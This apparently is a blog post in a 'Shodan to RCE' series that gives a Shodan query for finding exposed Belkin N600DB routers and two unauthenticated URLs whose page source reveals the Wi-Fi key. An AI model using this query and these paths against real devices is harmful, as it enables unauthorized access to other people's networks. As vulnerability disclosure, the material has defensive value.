From Shodan to Remote Code Execution #3: Hacking the Belkin N600DB Wireless Router

Our newest post of this interesting series of Shodan to RCE takes us to Belkin routers.

Shodan search:

“Server: httpd” “Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0” “100-index.htm”

belkin shodan search

As at the time of writing this post, there were not so many results for the Belkin routers )-:

By navigating to one of the shodan search results, we may get such a dashboard, which in itself may be reported as a security vulnerability? – unauthorized access?, information disclosure?

belkin dashboard_

 

Getting key, method #1

By navigating to the link http://target//langchg.cgi and view the source..

key1_

The key can be clearly seen above, without authentication!

Getting key, method #2

By navigating to the link http://target/adv_wifidef.cgi and view the source..

key2_

Again, the key can be clearly seen above, without authentication!

 

Credits to the exploit author: Wadeek.

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s